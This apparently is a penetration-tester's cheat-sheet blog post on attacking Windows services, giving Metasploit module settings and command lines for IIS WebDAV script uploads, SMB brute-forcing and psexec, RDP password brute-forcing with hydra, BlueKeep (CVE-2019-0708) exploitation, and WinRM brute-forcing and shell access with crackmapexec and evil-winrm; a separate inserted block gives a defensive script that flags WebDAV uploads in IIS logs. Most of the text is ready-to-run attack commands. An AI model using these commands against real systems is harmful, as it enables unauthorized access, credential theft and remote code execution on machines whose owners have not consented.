root💀bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!


Exploiting Microsoft IIS WebDav

Typically configured to run on port 80/443.

Supported executable file extensions:

  1. .asp
  2. .aspx
  3. .config
  4. .php

WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allows users to collaboratively edit and manage files on remote web servers.

Tools

  1. davtest - used to scan, authenticate to and exploit a WebDAV server. Comes preinstalled on Kali.
  2. cadaver - supports file upload, download and on-screen display. Comes preinstalled on Kali.

Command to upload to WebDAV using cadaver

cadaver http://10.10.10.10/webdav

To use Metasploit to exploit WebDAV

use exploit/windows/iis/iis_webdav_upload_asp
set HttpUsername
set HttpPassword
set RHOSTS
set PATH /webdav/metasploit%RAND%.asp
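Added example (not part of these notes): from the defender's side, the upload described above shows up in the IIS W3C log as a PUT of one of the executable extensions listed at the top of this section. This script parses a constructed sample log using the #Fields header and flags such uploads, noting whether the server accepted them (2xx) or refused them.

```python
from typing import Dict, List

# The extensions these notes list as executable on IIS WebDAV
EXECUTABLE_EXTENSIONS = (".asp", ".aspx", ".config", ".php")

# Constructed sample IIS W3C log (not a real capture). IIS replaces spaces in
# logged values with '+', so every field is a single space-free token.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus
2024-03-01 09:10:11 10.10.10.10 GET /index.html - 80 - 10.10.14.5 Mozilla/5.0 200 0
2024-03-01 09:10:20 10.10.10.10 PROPFIND /webdav/ - 80 - 10.10.14.5 cadaver/0.23.3 207 0
2024-03-01 09:10:31 10.10.10.10 PUT /webdav/notes.txt - 80 - 10.10.14.5 cadaver/0.23.3 201 0
2024-03-01 09:10:45 10.10.10.10 PUT /webdav/metasploit4821.asp - 80 - 10.10.14.5 Mozilla/5.0 201 0
2024-03-01 09:11:02 10.10.10.10 PUT /webdav/shell.aspx - 80 - 10.10.14.5 Mozilla/5.0 403 0
"""


def parse_w3c_log(text: str) -> List[Dict[str, str]]:
    """Turn W3C extended log lines into dicts keyed by the names in #Fields."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # header defines the column order
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split(" "))))
    return rows


def find_webdav_uploads(text: str) -> List[Dict[str, object]]:
    """Return every PUT whose target path ends in an executable extension."""
    hits: List[Dict[str, object]] = []
    for row in parse_w3c_log(text):
        if row.get("cs-method") != "PUT":
            continue
        stem = row.get("cs-uri-stem", "")
        if stem.lower().endswith(EXECUTABLE_EXTENSIONS):
            hits.append({
                "client": row["c-ip"],
                "path": stem,
                "status": row["sc-status"],
                "succeeded": row["sc-status"].startswith("2"),  # 201 = stored
            })
    return hits


if __name__ == "__main__":
    for hit in find_webdav_uploads(SAMPLE_IIS_LOG):
        print(hit)
```

A refused upload (403 here) is still worth an alert: it shows someone probing the share for writable script extensions, which is exactly what davtest does.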

Wordlists to use when brute-forcing usernames and passwords for services

/usr/share/metasploit-framework/data/wordlists/common_users.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Using Metasploit to brute-force SMB

use auxiliary/scanner/smb/smb_login
set verbose false
set stop_on_success false
set RHOSTS
set USER_FILE
set PASS_FILE

Exploiting SMB with psexec

// a password is needed
psexec.py username@10.10.10.10 cmd.exe 

Exploiting SMB with psexec in Metasploit

use exploit/windows/smb/psexec
set RHOSTS
set SMBUser
set SMBPass

The CVE for EternalBlue is CVE-2017-0144.

Exploiting RDP

RDP (Remote Desktop Protocol) is used to remotely connect to and interact with a Windows system. It runs on port 3389 but can also be configured to run on any other TCP port.

Using Metasploit to scan RDP

use auxiliary/scanner/rdp/rdp_scanner 
set RPORT (to the port you suspect is running RDP)

Brute-forcing RDP credentials

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.10.10.10:3333 -t 16

To connect to RDP

xfreerdp /u:administrator /p:qwertyuiop /v:10.10.10.10:3333

Exploiting the Windows CVE-2019-0708 RDP vulnerability (BlueKeep)

Microsoft patched this vulnerability in May 2019. An attacker gains access to a chunk of kernel memory, consequently allowing them to remotely execute arbitrary code at the SYSTEM level without authentication.

Using Metasploit to check whether the target is vulnerable

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS
run

Using Metasploit to exploit it

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS
show targets
set target 

Exploiting WinRM

WinRM (Windows Remote Management) can be used to facilitate remote access to Windows systems over HTTP(S). It uses TCP port 5985 (HTTP) and 5986 (HTTPS).

crackmapexec can be used to brute-force WinRM in order to identify users and their passwords, as well as to execute commands on the target system.

A Ruby script called "evil-winrm" can be used to obtain a command shell session on the target system.

Using crackmapexec (the username is mostly administrator)

crackmapexec winrm 10.10.10.10 -u username -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Using crackmapexec to run arbitrary commands

crackmapexec winrm 10.10.10.10 -u username -p password -x

To get a reverse shell, we'll be using evil-winrm, which is a Ruby script

evil-winrm.rb -u username -p 'password' -i 10.10.10.10

Using Metasploit

use exploit/windows/winrm/winrm_script_exec
set RHOSTS
set FORCE_VBS true
set USERNAME
set PASSWORD